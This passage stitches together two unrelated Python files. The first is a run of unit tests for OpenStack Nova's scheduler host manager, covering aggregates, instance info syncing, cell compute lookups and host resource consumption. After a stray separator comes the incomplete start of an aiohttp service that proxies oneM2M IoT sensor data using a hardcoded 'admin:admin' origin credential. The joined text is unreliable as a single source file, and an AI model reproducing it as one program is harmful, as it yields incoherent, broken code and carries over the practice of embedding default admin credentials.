host_state = host_states_map[('fake', 'fake')]
self.assertEqual([], host_state.aggregates)
@mock.patch.object(nova.objects.InstanceList, 'get_by_host',
return_value=objects.InstanceList())
@mock.patch.object(host_manager.HostState, '_update_from_compute_node')
@mock.patch.object(objects.ComputeNodeList, 'get_all')
@mock.patch.object(objects.ServiceList, 'get_by_binary')
def test_get_all_host_states_corrupt_aggregates_info(self,
svc_get_by_binary,
cn_get_all,
update_from_cn,
mock_get_by_host):
"""Regression test for bug 1605804
A host can be in multiple host-aggregates at the same time. When a
host gets removed from an aggregate in thread A and this aggregate
gets deleted in thread B, there can be a race-condition where the
mapping data in the host_manager can get out of sync for a moment.
This test simulates this condition for the bug-fix.
"""
host_a = 'host_a'
host_b = 'host_b'
svc_get_by_binary.return_value = [objects.Service(host=host_a),
objects.Service(host=host_b)]
cn_get_all.return_value = [
objects.ComputeNode(host=host_a, hypervisor_hostname=host_a),
objects.ComputeNode(host=host_b, hypervisor_hostname=host_b)]
aggregate = objects.Aggregate(id=1)
aggregate.hosts = [host_a, host_b]
aggr_list = objects.AggregateList()
aggr_list.objects = [aggregate]
self.host_manager.update_aggregates(aggr_list)
aggregate.hosts = [host_a]
self.host_manager.delete_aggregate(aggregate)
self.host_manager.get_all_host_states('fake-context')
@mock.patch('nova.objects.ServiceList.get_by_binary')
@mock.patch('nova.objects.ComputeNodeList.get_all')
@mock.patch('nova.objects.InstanceList.get_by_host')
def test_get_all_host_states_updated(self, mock_get_by_host,
mock_get_all_comp,
mock_get_svc_by_binary):
mock_get_all_comp.return_value = fakes.COMPUTE_NODES
mock_get_svc_by_binary.return_value = fakes.SERVICES
context = 'fake_context'
hm = self.host_manager
inst1 = objects.Instance(uuid=uuids.instance)
cn1 = objects.ComputeNode(host='host1')
hm._instance_info = {'host1': {'instances': {uuids.instance: inst1},
'updated': True}}
host_state = host_manager.HostState('host1', cn1, uuids.cell)
self.assertFalse(host_state.instances)
mock_get_by_host.return_value = None
host_state.update(
inst_dict=hm._get_instance_info(context, cn1))
self.assertFalse(mock_get_by_host.called)
self.assertTrue(host_state.instances)
self.assertEqual(host_state.instances[uuids.instance], inst1)
@mock.patch('nova.objects.ServiceList.get_by_binary')
@mock.patch('nova.objects.ComputeNodeList.get_all')
@mock.patch('nova.objects.InstanceList.get_by_host')
def test_get_all_host_states_not_updated(self, mock_get_by_host,
mock_get_all_comp,
mock_get_svc_by_binary):
mock_get_all_comp.return_value = fakes.COMPUTE_NODES
mock_get_svc_by_binary.return_value = fakes.SERVICES
context = 'fake_context'
hm = self.host_manager
inst1 = objects.Instance(uuid=uuids.instance)
cn1 = objects.ComputeNode(host='host1')
hm._instance_info = {'host1': {'instances': {uuids.instance: inst1},
'updated': False}}
host_state = host_manager.HostState('host1', cn1, uuids.cell)
self.assertFalse(host_state.instances)
mock_get_by_host.return_value = objects.InstanceList(objects=[inst1])
host_state.update(
inst_dict=hm._get_instance_info(context, cn1))
mock_get_by_host.assert_called_once_with(
context, cn1.host, expected_attrs=[])
self.assertTrue(host_state.instances)
self.assertEqual(host_state.instances[uuids.instance], inst1)
@mock.patch('nova.objects.InstanceList.get_by_host')
def test_recreate_instance_info(self, mock_get_by_host):
host_name = 'fake_host'
inst1 = fake_instance.fake_instance_obj('fake_context',
uuid=uuids.instance_1,
host=host_name)
inst2 = fake_instance.fake_instance_obj('fake_context',
uuid=uuids.instance_2,
host=host_name)
orig_inst_dict = {inst1.uuid: inst1, inst2.uuid: inst2}
new_inst_list = objects.InstanceList(objects=[inst1, inst2])
mock_get_by_host.return_value = new_inst_list
self.host_manager._instance_info = {
host_name: {
'instances': orig_inst_dict,
'updated': True,
}}
self.host_manager._recreate_instance_info('fake_context', host_name)
new_info = self.host_manager._instance_info[host_name]
self.assertEqual(len(new_info['instances']), len(new_inst_list))
self.assertFalse(new_info['updated'])
def test_update_instance_info(self):
host_name = 'fake_host'
inst1 = fake_instance.fake_instance_obj('fake_context',
uuid=uuids.instance_1,
host=host_name)
inst2 = fake_instance.fake_instance_obj('fake_context',
uuid=uuids.instance_2,
host=host_name)
orig_inst_dict = {inst1.uuid: inst1, inst2.uuid: inst2}
self.host_manager._instance_info = {
host_name: {
'instances': orig_inst_dict,
'updated': False,
}}
inst3 = fake_instance.fake_instance_obj('fake_context',
uuid=uuids.instance_3,
host=host_name)
inst4 = fake_instance.fake_instance_obj('fake_context',
uuid=uuids.instance_4,
host=host_name)
update = objects.InstanceList(objects=[inst3, inst4])
self.host_manager.update_instance_info('fake_context', host_name,
update)
new_info = self.host_manager._instance_info[host_name]
self.assertEqual(len(new_info['instances']), 4)
self.assertTrue(new_info['updated'])
def test_update_instance_info_unknown_host(self):
self.host_manager._recreate_instance_info = mock.MagicMock()
host_name = 'fake_host'
inst1 = fake_instance.fake_instance_obj('fake_context',
uuid=uuids.instance_1,
host=host_name)
inst2 = fake_instance.fake_instance_obj('fake_context',
uuid=uuids.instance_2,
host=host_name)
orig_inst_dict = {inst1.uuid: inst1, inst2.uuid: inst2}
self.host_manager._instance_info = {
host_name: {
'instances': orig_inst_dict,
'updated': False,
}}
bad_host = 'bad_host'
inst3 = fake_instance.fake_instance_obj('fake_context',
uuid=uuids.instance_3,
host=bad_host)
inst_list3 = objects.InstanceList(objects=[inst3])
self.host_manager.update_instance_info('fake_context', bad_host,
inst_list3)
new_info = self.host_manager._instance_info[host_name]
self.host_manager._recreate_instance_info.assert_called_once_with(
'fake_context', bad_host)
self.assertEqual(len(new_info['instances']), len(orig_inst_dict))
self.assertFalse(new_info['updated'])
@mock.patch('nova.objects.HostMapping.get_by_host',
side_effect=exception.HostMappingNotFound(name='host1'))
def test_update_instance_info_unknown_host_mapping_not_found(self,
get_by_host):
"""Tests that case that update_instance_info is called with an
unregistered host so the host manager attempts to recreate the
instance list, but there is no host mapping found for the given
host (it might have just started not be discovered for cells
v2 yet).
"""
ctxt = nova_context.RequestContext()
instance_info = objects.InstanceList()
self.host_manager.update_instance_info(ctxt, 'host1', instance_info)
self.assertDictEqual(
{}, self.host_manager._instance_info['host1']['instances'])
get_by_host.assert_called_once_with(ctxt, 'host1')
def test_delete_instance_info(self):
host_name = 'fake_host'
inst1 = fake_instance.fake_instance_obj('fake_context',
uuid=uuids.instance_1,
host=host_name)
inst2 = fake_instance.fake_instance_obj('fake_context',
uuid=uuids.instance_2,
host=host_name)
orig_inst_dict = {inst1.uuid: inst1, inst2.uuid: inst2}
self.host_manager._instance_info = {
host_name: {
'instances': orig_inst_dict,
'updated': False,
}}
self.host_manager.delete_instance_info('fake_context', host_name,
inst1.uuid)
new_info = self.host_manager._instance_info[host_name]
self.assertEqual(len(new_info['instances']), 1)
self.assertTrue(new_info['updated'])
def test_delete_instance_info_unknown_host(self):
self.host_manager._recreate_instance_info = mock.MagicMock()
host_name = 'fake_host'
inst1 = fake_instance.fake_instance_obj('fake_context',
uuid=uuids.instance_1,
host=host_name)
inst2 = fake_instance.fake_instance_obj('fake_context',
uuid=uuids.instance_2,
host=host_name)
orig_inst_dict = {inst1.uuid: inst1, inst2.uuid: inst2}
self.host_manager._instance_info = {
host_name: {
'instances': orig_inst_dict,
'updated': False,
}}
bad_host = 'bad_host'
self.host_manager.delete_instance_info('fake_context', bad_host,
uuids.instance_1)
new_info = self.host_manager._instance_info[host_name]
self.host_manager._recreate_instance_info.assert_called_once_with(
'fake_context', bad_host)
self.assertEqual(len(new_info['instances']), len(orig_inst_dict))
self.assertFalse(new_info['updated'])
def test_sync_instance_info(self):
self.host_manager._recreate_instance_info = mock.MagicMock()
host_name = 'fake_host'
inst1 = fake_instance.fake_instance_obj('fake_context',
uuid=uuids.instance_1,
host=host_name)
inst2 = fake_instance.fake_instance_obj('fake_context',
uuid=uuids.instance_2,
host=host_name)
orig_inst_dict = {inst1.uuid: inst1, inst2.uuid: inst2}
self.host_manager._instance_info = {
host_name: {
'instances': orig_inst_dict,
'updated': False,
}}
self.host_manager.sync_instance_info('fake_context', host_name,
[uuids.instance_2,
uuids.instance_1])
new_info = self.host_manager._instance_info[host_name]
self.assertFalse(self.host_manager._recreate_instance_info.called)
self.assertTrue(new_info['updated'])
def test_sync_instance_info_fail(self):
self.host_manager._recreate_instance_info = mock.MagicMock()
host_name = 'fake_host'
inst1 = fake_instance.fake_instance_obj('fake_context',
uuid=uuids.instance_1,
host=host_name)
inst2 = fake_instance.fake_instance_obj('fake_context',
uuid=uuids.instance_2,
host=host_name)
orig_inst_dict = {inst1.uuid: inst1, inst2.uuid: inst2}
self.host_manager._instance_info = {
host_name: {
'instances': orig_inst_dict,
'updated': False,
}}
self.host_manager.sync_instance_info('fake_context', host_name,
[uuids.instance_2,
uuids.instance_1, 'new'])
new_info = self.host_manager._instance_info[host_name]
self.host_manager._recreate_instance_info.assert_called_once_with(
'fake_context', host_name)
self.assertFalse(new_info['updated'])
@mock.patch('nova.objects.CellMappingList.get_all')
@mock.patch('nova.objects.ComputeNodeList.get_all')
@mock.patch('nova.objects.ServiceList.get_by_binary')
def test_get_computes_for_cells(self, mock_sl, mock_cn, mock_cm):
cells = [
objects.CellMapping(uuid=uuids.cell1,
db_connection='none://1',
transport_url='none://'),
objects.CellMapping(uuid=uuids.cell2,
db_connection='none://2',
transport_url='none://'),
]
mock_cm.return_value = cells
mock_sl.side_effect = [
[objects.ServiceList(host='foo')],
[objects.ServiceList(host='bar')],
]
mock_cn.side_effect = [
[objects.ComputeNode(host='foo')],
[objects.ComputeNode(host='bar')],
]
context = nova_context.RequestContext('fake', 'fake')
cns, srv = self.host_manager._get_computes_for_cells(context, cells)
self.assertEqual({uuids.cell1: ['foo'],
uuids.cell2: ['bar']},
{cell: [cn.host for cn in computes]
for cell, computes in cns.items()})
self.assertEqual(['bar', 'foo'], sorted(list(srv.keys())))
@mock.patch('nova.objects.CellMappingList.get_all')
@mock.patch('nova.objects.ComputeNodeList.get_all_by_uuids')
@mock.patch('nova.objects.ServiceList.get_by_binary')
def test_get_computes_for_cells_uuid(self, mock_sl, mock_cn, mock_cm):
cells = [
objects.CellMapping(uuid=uuids.cell1,
db_connection='none://1',
transport_url='none://'),
objects.CellMapping(uuid=uuids.cell2,
db_connection='none://2',
transport_url='none://'),
]
mock_cm.return_value = cells
mock_sl.side_effect = [
[objects.ServiceList(host='foo')],
[objects.ServiceList(host='bar')],
]
mock_cn.side_effect = [
[objects.ComputeNode(host='foo')],
[objects.ComputeNode(host='bar')],
]
context = nova_context.RequestContext('fake', 'fake')
cns, srv = self.host_manager._get_computes_for_cells(context, cells,
[])
self.assertEqual({uuids.cell1: ['foo'],
uuids.cell2: ['bar']},
{cell: [cn.host for cn in computes]
for cell, computes in cns.items()})
self.assertEqual(['bar', 'foo'], sorted(list(srv.keys())))
@mock.patch('nova.context.target_cell')
@mock.patch('nova.objects.CellMappingList.get_all')
@mock.patch('nova.objects.ComputeNodeList.get_all')
@mock.patch('nova.objects.ServiceList.get_by_binary')
def test_get_computes_for_cells_limit_to_cell(self, mock_sl,
mock_cn, mock_cm,
mock_target):
host_manager.LOG.debug = host_manager.LOG.error
cells = [
objects.CellMapping(uuid=uuids.cell1,
database_connection='none://1',
transport_url='none://'),
objects.CellMapping(uuid=uuids.cell2,
database_connection='none://2',
transport_url='none://'),
]
mock_sl.return_value = [objects.ServiceList(host='foo')]
mock_cn.return_value = [objects.ComputeNode(host='foo')]
mock_cm.return_value = cells
@contextlib.contextmanager
def fake_set_target(context, cell):
yield mock.sentinel.cctxt
mock_target.side_effect = fake_set_target
context = nova_context.RequestContext('fake', 'fake')
cns, srv = self.host_manager._get_computes_for_cells(
context, cells=cells[1:])
self.assertEqual({uuids.cell2: ['foo']},
{cell: [cn.host for cn in computes]
for cell, computes in cns.items()})
self.assertEqual(['foo'], list(srv.keys()))
# NOTE(danms): We have two cells, but we should only have
# targeted one if we honored the only-cell destination requirement,
# and only looked up services and compute nodes in one
mock_target.assert_called_once_with(context, cells[1])
mock_cn.assert_called_once_with(mock.sentinel.cctxt)
mock_sl.assert_called_once_with(mock.sentinel.cctxt, 'nova-compute',
include_disabled=True)
@mock.patch('nova.context.scatter_gather_cells')
def test_get_computes_for_cells_failures(self, mock_sg):
mock_sg.return_value = {
uuids.cell1: ([mock.MagicMock(host='a'), mock.MagicMock(host='b')],
[mock.sentinel.c1n1, mock.sentinel.c1n2]),
uuids.cell2: nova_context.did_not_respond_sentinel,
uuids.cell3: nova_context.raised_exception_sentinel,
}
context = nova_context.RequestContext('fake', 'fake')
cns, srv = self.host_manager._get_computes_for_cells(context, [])
self.assertEqual({uuids.cell1: [mock.sentinel.c1n1,
mock.sentinel.c1n2]}, cns)
self.assertEqual(['a', 'b'], sorted(srv.keys()))
class HostManagerChangedNodesTestCase(test.NoDBTestCase):
"""Test case for HostManager class."""
@mock.patch.object(host_manager.HostManager, '_init_instance_info')
@mock.patch.object(host_manager.HostManager, '_init_aggregates')
def setUp(self, mock_init_agg, mock_init_inst):
super(HostManagerChangedNodesTestCase, self).setUp()
self.host_manager = host_manager.HostManager()
self.fake_hosts = [
host_manager.HostState('host1', 'node1', uuids.cell),
host_manager.HostState('host2', 'node2', uuids.cell),
host_manager.HostState('host3', 'node3', uuids.cell),
host_manager.HostState('host4', 'node4', uuids.cell)
]
@mock.patch('nova.objects.ServiceList.get_by_binary')
@mock.patch('nova.objects.ComputeNodeList.get_all')
@mock.patch('nova.objects.InstanceList.get_by_host')
def test_get_all_host_states(self, mock_get_by_host, mock_get_all,
mock_get_by_binary):
mock_get_by_host.return_value = objects.InstanceList()
mock_get_all.return_value = fakes.COMPUTE_NODES
mock_get_by_binary.return_value = fakes.SERVICES
context = 'fake_context'
# get_all_host_states returns a generator, so make a map from it
host_states_map = {(state.host, state.nodename): state for state in
self.host_manager.get_all_host_states(context)}
self.assertEqual(len(host_states_map), 4)
@mock.patch('nova.objects.ServiceList.get_by_binary')
@mock.patch('nova.objects.ComputeNodeList.get_all')
@mock.patch('nova.objects.InstanceList.get_by_host')
def test_get_all_host_states_after_delete_one(self, mock_get_by_host,
mock_get_all,
mock_get_by_binary):
getter = (lambda n: n.hypervisor_hostname
if 'hypervisor_hostname' in n else None)
running_nodes = [n for n in fakes.COMPUTE_NODES
if getter(n) != 'node4']
mock_get_by_host.return_value = objects.InstanceList()
mock_get_all.side_effect = [fakes.COMPUTE_NODES, running_nodes]
mock_get_by_binary.side_effect = [fakes.SERVICES, fakes.SERVICES]
context = 'fake_context'
# first call: all nodes
hosts = self.host_manager.get_all_host_states(context)
# get_all_host_states returns a generator, so make a map from it
host_states_map = {(state.host, state.nodename): state for state in
hosts}
self.assertEqual(len(host_states_map), 4)
# second call: just running nodes
hosts = self.host_manager.get_all_host_states(context)
host_states_map = {(state.host, state.nodename): state for state in
hosts}
self.assertEqual(len(host_states_map), 3)
@mock.patch('nova.objects.ServiceList.get_by_binary')
@mock.patch('nova.objects.ComputeNodeList.get_all')
@mock.patch('nova.objects.InstanceList.get_by_host')
def test_get_all_host_states_after_delete_all(self, mock_get_by_host,
mock_get_all,
mock_get_by_binary):
mock_get_by_host.return_value = objects.InstanceList()
mock_get_all.side_effect = [fakes.COMPUTE_NODES, []]
mock_get_by_binary.side_effect = [fakes.SERVICES, fakes.SERVICES]
context = 'fake_context'
# first call: all nodes
hosts = self.host_manager.get_all_host_states(context)
# get_all_host_states returns a generator, so make a map from it
host_states_map = {(state.host, state.nodename): state for state in
hosts}
self.assertEqual(len(host_states_map), 4)
# second call: no nodes
hosts = self.host_manager.get_all_host_states(context)
host_states_map = {(state.host, state.nodename): state for state in
hosts}
self.assertEqual(len(host_states_map), 0)
@mock.patch('nova.objects.ServiceList.get_by_binary')
@mock.patch('nova.objects.ComputeNodeList.get_all_by_uuids')
@mock.patch('nova.objects.InstanceList.get_by_host')
def test_get_host_states_by_uuids(self, mock_get_by_host, mock_get_all,
mock_get_by_binary):
mock_get_by_host.return_value = objects.InstanceList()
mock_get_all.side_effect = [fakes.COMPUTE_NODES, []]
mock_get_by_binary.side_effect = [fakes.SERVICES, fakes.SERVICES]
# Request 1: all nodes can satisfy the request
hosts1 = self.host_manager.get_host_states_by_uuids(
mock.sentinel.ctxt1, mock.sentinel.uuids1, objects.RequestSpec())
# get_host_states_by_uuids returns a generator so convert the values
# into an iterator
host_states1 = iter(hosts1)
# Request 2: no nodes can satisfy the request
hosts2 = self.host_manager.get_host_states_by_uuids(
mock.sentinel.ctxt2, mock.sentinel.uuids2, objects.RequestSpec())
host_states2 = iter(hosts2)
# Fake a concurrent request that is still processing the first result
# to make sure all nodes are still available candidates to Request 1.
num_hosts1 = len(list(host_states1))
self.assertEqual(4, num_hosts1)
# Verify that no nodes are available to Request 2.
num_hosts2 = len(list(host_states2))
self.assertEqual(0, num_hosts2)
class HostStateTestCase(test.NoDBTestCase):
"""Test case for HostState class."""
# update_from_compute_node() and consume_from_request() are tested
# in HostManagerTestCase.test_get_all_host_states()
@mock.patch('nova.utils.synchronized',
side_effect=lambda a: lambda f: lambda *args: f(*args))
def test_stat_consumption_from_compute_node(self, sync_mock):
stats = {
'num_instances': '5',
'num_proj_12345': '3',
'num_proj_23456': '1',
'num_vm_%s' % vm_states.BUILDING: '2',
'num_vm_%s' % vm_states.SUSPENDED: '1',
'num_task_%s' % task_states.RESIZE_MIGRATING: '1',
'num_task_%s' % task_states.MIGRATING: '2',
'num_os_type_linux': '4',
'num_os_type_windoze': '1',
'io_workload': '42',
}
hyper_ver_int = versionutils.convert_version_to_int('6.0.0')
compute = objects.ComputeNode(
uuid=uuids.cn1,
stats=stats, memory_mb=1, free_disk_gb=0, local_gb=0,
local_gb_used=0, free_ram_mb=0, vcpus=0, vcpus_used=0,
disk_available_least=None,
updated_at=datetime.datetime(2015, 11, 11, 11, 0, 0),
host_ip='127.0.0.1', hypervisor_type='htype',
hypervisor_hostname='hostname', cpu_info='cpu_info',
supported_hv_specs=[],
hypervisor_version=hyper_ver_int, numa_topology=None,
pci_device_pools=None, metrics=None,
cpu_allocation_ratio=16.0, ram_allocation_ratio=1.5,
disk_allocation_ratio=1.0)
host = host_manager.HostState("fakehost", "fakenode", uuids.cell)
host.update(compute=compute)
sync_mock.assert_called_once_with(("fakehost", "fakenode"))
self.assertEqual(5, host.num_instances)
self.assertEqual(42, host.num_io_ops)
self.assertEqual(10, len(host.stats))
self.assertEqual('127.0.0.1', str(host.host_ip))
self.assertEqual('htype', host.hypervisor_type)
self.assertEqual('hostname', host.hypervisor_hostname)
self.assertEqual('cpu_info', host.cpu_info)
self.assertEqual([], host.supported_instances)
self.assertEqual(hyper_ver_int, host.hypervisor_version)
def test_stat_consumption_from_compute_node_non_pci(self):
stats = {
'num_instances': '5',
'num_proj_12345': '3',
'num_proj_23456': '1',
'num_vm_%s' % vm_states.BUILDING: '2',
'num_vm_%s' % vm_states.SUSPENDED: '1',
'num_task_%s' % task_states.RESIZE_MIGRATING: '1',
'num_task_%s' % task_states.MIGRATING: '2',
'num_os_type_linux': '4',
'num_os_type_windoze': '1',
'io_workload': '42',
}
hyper_ver_int = versionutils.convert_version_to_int('6.0.0')
compute = objects.ComputeNode(
uuid=uuids.cn1,
stats=stats, memory_mb=0, free_disk_gb=0, local_gb=0,
local_gb_used=0, free_ram_mb=0, vcpus=0, vcpus_used=0,
disk_available_least=None,
updated_at=datetime.datetime(2015, 11, 11, 11, 0, 0),
host_ip='127.0.0.1', hypervisor_type='htype',
hypervisor_hostname='hostname', cpu_info='cpu_info',
supported_hv_specs=[],
hypervisor_version=hyper_ver_int, numa_topology=None,
pci_device_pools=None, metrics=None,
cpu_allocation_ratio=16.0, ram_allocation_ratio=1.5,
disk_allocation_ratio=1.0)
host = host_manager.HostState("fakehost", "fakenode", uuids.cell)
host.update(compute=compute)
self.assertEqual([], host.pci_stats.pools)
self.assertEqual(hyper_ver_int, host.hypervisor_version)
def test_stat_consumption_from_compute_node_rescue_unshelving(self):
stats = {
'num_instances': '5',
'num_proj_12345': '3',
'num_proj_23456': '1',
'num_vm_%s' % vm_states.BUILDING: '2',
'num_vm_%s' % vm_states.SUSPENDED: '1',
'num_task_%s' % task_states.UNSHELVING: '1',
'num_task_%s' % task_states.RESCUING: '2',
'num_os_type_linux': '4',
'num_os_type_windoze': '1',
'io_workload': '42',
}
hyper_ver_int = versionutils.convert_version_to_int('6.0.0')
compute = objects.ComputeNode(
uuid=uuids.cn1,
stats=stats, memory_mb=0, free_disk_gb=0, local_gb=0,
local_gb_used=0, free_ram_mb=0, vcpus=0, vcpus_used=0,
disk_available_least=None,
updated_at=datetime.datetime(2015, 11, 11, 11, 0, 0),
host_ip='127.0.0.1', hypervisor_type='htype',
hypervisor_hostname='hostname', cpu_info='cpu_info',
supported_hv_specs=[],
hypervisor_version=hyper_ver_int, numa_topology=None,
pci_device_pools=None, metrics=None,
cpu_allocation_ratio=16.0, ram_allocation_ratio=1.5,
disk_allocation_ratio=1.0)
host = host_manager.HostState("fakehost", "fakenode", uuids.cell)
host.update(compute=compute)
self.assertEqual(5, host.num_instances)
self.assertEqual(42, host.num_io_ops)
self.assertEqual(10, len(host.stats))
self.assertEqual([], host.pci_stats.pools)
self.assertEqual(hyper_ver_int, host.hypervisor_version)
@mock.patch('nova.utils.synchronized',
side_effect=lambda a: lambda f: lambda *args: f(*args))
@mock.patch('nova.virt.hardware.get_host_numa_usage_from_instance')
@mock.patch('nova.objects.Instance')
@mock.patch('nova.virt.hardware.numa_fit_instance_to_host')
@mock.patch('nova.virt.hardware.host_topology_and_format_from_host')
def test_stat_consumption_from_instance(self, host_topo_mock,
numa_fit_mock,
instance_init_mock,
numa_usage_mock,
sync_mock):
fake_numa_topology = objects.InstanceNUMATopology(
cells=[objects.InstanceNUMACell()])
fake_host_numa_topology = mock.Mock()
fake_instance = objects.Instance(numa_topology=fake_numa_topology)
host_topo_mock.return_value = (fake_host_numa_topology, True)
numa_usage_mock.return_value = fake_host_numa_topology
numa_fit_mock.return_value = fake_numa_topology
instance_init_mock.return_value = fake_instance
spec_obj = objects.RequestSpec(
instance_uuid=uuids.instance,
flavor=objects.Flavor(root_gb=0, ephemeral_gb=0, memory_mb=0,
vcpus=0),
numa_topology=fake_numa_topology,
pci_requests=objects.InstancePCIRequests(requests=[]))
host = host_manager.HostState("fakehost", "fakenode", uuids.cell)
self.assertIsNone(host.updated)
host.consume_from_request(spec_obj)
numa_fit_mock.assert_called_once_with(fake_host_numa_topology,
fake_numa_topology,
limits=None, pci_requests=None,
pci_stats=None)
numa_usage_mock.assert_called_once_with(host, fake_instance)
sync_mock.assert_called_once_with(("fakehost", "fakenode"))
self.assertEqual(fake_host_numa_topology, host.numa_topology)
self.assertIsNotNone(host.updated)
second_numa_topology = objects.InstanceNUMATopology(
cells=[objects.InstanceNUMACell()])
spec_obj = objects.RequestSpec(
instance_uuid=uuids.instance,
flavor=objects.Flavor(root_gb=0, ephemeral_gb=0, memory_mb=0,
vcpus=0),
numa_topology=second_numa_topology,
pci_requests=objects.InstancePCIRequests(requests=[]))
second_host_numa_topology = mock.Mock()
numa_usage_mock.return_value = second_host_numa_topology
numa_fit_mock.return_value = second_numa_topology
host.consume_from_request(spec_obj)
self.assertEqual(2, host.num_instances)
self.assertEqual(2, host.num_io_ops)
self.assertEqual(2, numa_usage_mock.call_count)
self.assertEqual(((host, fake_instance),), numa_usage_mock.call_args)
self.assertEqual(second_host_numa_topology, host.numa_topology)
self.assertIsNotNone(host.updated)
def test_stat_consumption_from_instance_pci(self):
inst_topology = objects.InstanceNUMATopology(
cells = [objects.InstanceNUMACell(
cpuset=set([0]),
memory=512, id=0)])
fake_requests = [{'request_id': uuids.request_id, 'count': 1,
'spec': [{'vendor_id': '8086'}]}]
fake_requests_obj = objects.InstancePCIRequests(
requests=[objects.InstancePCIRequest(**r)
for r in fake_requests],
instance_uuid=uuids.instance)
req_spec = objects.RequestSpec(
instance_uuid=uuids.instance,
project_id='12345',
numa_topology=inst_topology,
pci_requests=fake_requests_obj,
flavor=objects.Flavor(root_gb=0,
ephemeral_gb=0,
memory_mb=512,
vcpus=1))
host = host_manager.HostState("fakehost", "fakenode", uuids.cell)
self.assertIsNone(host.updated)
host.pci_stats = pci_stats.PciDeviceStats(
[objects.PciDevicePool(vendor_id='8086',
product_id='15ed',
numa_node=1,
count=1)])
host.numa_topology = fakes.NUMA_TOPOLOGY
host.consume_from_request(req_spec)
self.assertIsInstance(req_spec.numa_topology,
objects.InstanceNUMATopology)
self.assertEqual(512, host.numa_topology.cells[1].memory_usage)
self.assertEqual(1, host.numa_topology.cells[1].cpu_usage)
self.assertEqual(0, len(host.pci_stats.pools))
self.assertIsNotNone(host.updated)
def test_stat_consumption_from_instance_with_pci_exception(self):
fake_requests = [{'request_id': uuids.request_id, 'count': 3,
'spec': [{'vendor_id': '8086'}]}]
fake_requests_obj = objects.InstancePCIRequests(
requests=[objects.InstancePCIRequest(**r)
for r in fake_requests],
instance_uuid=uuids.instance)
req_spec = objects.RequestSpec(
instance_uuid=uuids.instance,
project_id='12345',
numa_topology=None,
pci_requests=fake_requests_obj,
flavor=objects.Flavor(root_gb=0,
ephemeral_gb=0,
memory_mb=1024,
vcpus=1))
host = host_manager.HostState("fakehost", "fakenode", uuids.cell)
self.assertIsNone(host.updated)
fake_updated = mock.sentinel.fake_updated
host.updated = fake_updated
host.pci_stats = pci_stats.PciDeviceStats()
with mock.patch.object(host.pci_stats, 'apply_requests',
side_effect=exception.PciDeviceRequestFailed):
host.consume_from_request(req_spec)
self.assertEqual(fake_updated, host.updated)
def test_resources_consumption_from_compute_node(self):
_ts_now = datetime.datetime(2015, 11, 11, 11, 0, 0)
metrics = [
dict(name='cpu.frequency',
value=1.0,
source='source1',
timestamp=_ts_now),
dict(name='numa.membw.current',
numa_membw_values={"0": 10, "1": 43},
source='source2',
timestamp=_ts_now),
]
hyper_ver_int = versionutils.convert_version_to_int('6.0.0')
compute = objects.ComputeNode(
uuid=uuids.cn1,
metrics=jsonutils.dumps(metrics),
memory_mb=0, free_disk_gb=0, local_gb=0,
local_gb_used=0, free_ram_mb=0, vcpus=0, vcpus_used=0,
disk_available_least=None,
updated_at=datetime.datetime(2015, 11, 11, 11, 0, 0),
host_ip='127.0.0.1', hypervisor_type='htype',
hypervisor_hostname='hostname', cpu_info='cpu_info',
supported_hv_specs=[],
hypervisor_version=hyper_ver_int,
numa_topology=fakes.NUMA_TOPOLOGY._to_json(),
stats=None, pci_device_pools=None,
cpu_allocation_ratio=16.0, ram_allocation_ratio=1.5,
disk_allocation_ratio=1.0)
host = host_manager.HostState("fakehost", "fakenode", uuids.cell)
host.update(compute=compute)
self.assertEqual(len(host.metrics), 2)
self.assertEqual(1.0, host.metrics.to_list()[0]['value'])
self.assertEqual('source1', host.metrics[0].source)
self.assertEqual('cpu.frequency', host.metrics[0].name)
self.assertEqual('numa.membw.current', host.metrics[1].name)
self.assertEqual('source2', host.metrics.to_list()[1]['source'])
self.assertEqual({'0': 10, '1': 43},
host.metrics[1].numa_membw_values)
self.assertIsInstance(host.numa_topology, six.string_types)
def test_stat_consumption_from_compute_node_not_ready(self):
compute = objects.ComputeNode(free_ram_mb=100,
uuid=uuids.compute_node_uuid)
host = host_manager.HostState("fakehost", "fakenode", uuids.cell)
host._update_from_compute_node(compute)
# Because compute record not ready, the update of free ram
# will not happen and the value will still be 0
self.assertEqual(0, host.free_ram_mb)
| |
#! /usr/bin/python3
__author__ = 'huanpc'
import asyncio
import http.client
from aiohttp import web
import logging
import sys
import cloudAMPQclient
import influxdb_client
from prometheus_export import PrometheusClient
import os
PROTOCOL = 'http'
HOST = '0.0.0.0'
PORT = 9090
M2M_HOST = '127.0.0.1'
if os.environ.get('ONEM2M_HOST_NAME'):
M2M_HOST = os.environ['ONEM2M_HOST_NAME']
M2M_PORT = '8080'
if os.environ.get('ONEM2M_PORT'):
M2M_PORT = os.environ['ONEM2M_PORT']
DOMAIN = M2M_HOST + ':' + M2M_PORT
HOST_NAME = HOST
if os.environ.get('HOST_NAME'):
HOST_NAME = os.environ['HOST_NAME']
logger = logging.getLogger('RESOURCE_TRACKING')
logging.basicConfig(stream=sys.stderr, level=getattr(logging, 'INFO'))
prometheus_client = PrometheusClient()
@asyncio.coroutine
def get_resource_state(request):
app_id = request.match_info.get('app_id')
if app_id == 'all':
app_ids = ['TEMPERATURE_SENSOR', 'AIR_HUMIDITY_SENSOR', 'LIGHT_SENSOR']
all_response = '<?xml version="1.0" encoding="UTF-8"?><root>'
for app_id in app_ids:
resource_uri = '/~/' + 'mn-cse/mn-name' + '/' + app_id + '/' + 'DATA' + '/' + 'la'
con = http.client.HTTPConnection(DOMAIN)
header = {'X-M2M-Origin': 'admin:admin', "Content-type": "application/xml"}
con.request('GET', resource_uri, '', header)
response = con.getresponse()
raw = response.read().decode()
raw = raw.replace('<?xml version="1.0" encoding="UTF-8"?>', '')
all_response += raw
all_response += '</root>'
logger.info("Request: GET/URI:" + all_response)
return web.Response(status=200, body=all_response.encode('utf-8'), content_type="application/xml")
else:
# 'http://127.0.0.1:8080/~/mn-cse/mn-name/LAMP_0/DATA/la'
resource_uri = '/~/' + 'mn-cse/mn-name' + '/' + app_id + '/' + 'DATA' + '/' + 'la'
con = http.client.HTTPConnection(DOMAIN)
header = {'X-M2M-Origin': 'admin:admin', "Content-type": "application/xml"}
con.request('GET', resource_uri, '', header)
response = con.getresponse()
logger.info("Request: GET/URI:" + resource_uri)
return web.Response(status=200, body=response.read(), content_type="application/xml")
@asyncio.coroutine
def get_all_resources_uri(request):
# http://127.0.0.1:8080/~/mn-cse?fu=1&poa=sample&ty=2
uri = '/~/mn-cse?fu=1&poa=sample&ty=2'
con = http.client.HTTPConnection(DOMAIN)
header = {'X-M2M-Origin': 'admin:admin', "Content-type": "application/xml"}
